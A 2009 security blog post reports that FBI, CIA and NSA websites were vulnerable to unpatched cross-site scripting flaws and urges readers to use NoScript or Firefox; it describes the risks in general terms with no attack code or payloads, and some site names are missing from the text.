Thursday, January 22, 2009

FBI, CIA and NSA websites susceptible to XSS attacks.

Popular xss archive website is reporting that government websites like, and are susceptible to XSS attacks found by independent researchers. Cross site scripting attacks are not new and have been causing damage since 2007, numerous trainings, presentations and books have been in market since its time of discovery but this has still been around like the SQL Injection bug and hundreds and thousands of websites are still susceptible to these sorts of attacks. Vulnerabilities of these kinds have been exploited to craft powerful phishing attacks and browser exploits. Impersonation of a legitimate website to run malicious code is one of the most effective attacks other then stealing cookies and running exploits using JavaScript with this sort of vulnerabilities. There are a host of other high profile websites that are affected by cross site scripting vulnerabilities including,,, and many others. The fact the headline of this blog reads the name of government agencies is that people trust them the most and their websites are vulnerable to such common flaws. Being a security researcher I do understand that pretty much no piece of code is completely secure but the time it takes to patch such security holes should be considered as a measuring point of the seriousness of security agencies. The flaw was reported on 9th January regarding the xss flaw but it is still not patched (22nd January) which shows that either they do not know about the flaw or they are not very serious in patching such issues. Whatever the case may be this post is to alert the users to be cautious as legitimate domains on your browser Navigation Toolbar may end up downloading malicious software on your computer. A precaution that you guys can take is installing NoScript on your firefox browsers which pretty much all Security Professionals do use nowadays while for IE users I suggest changing your browser to Mozilla Firefox.

No comments: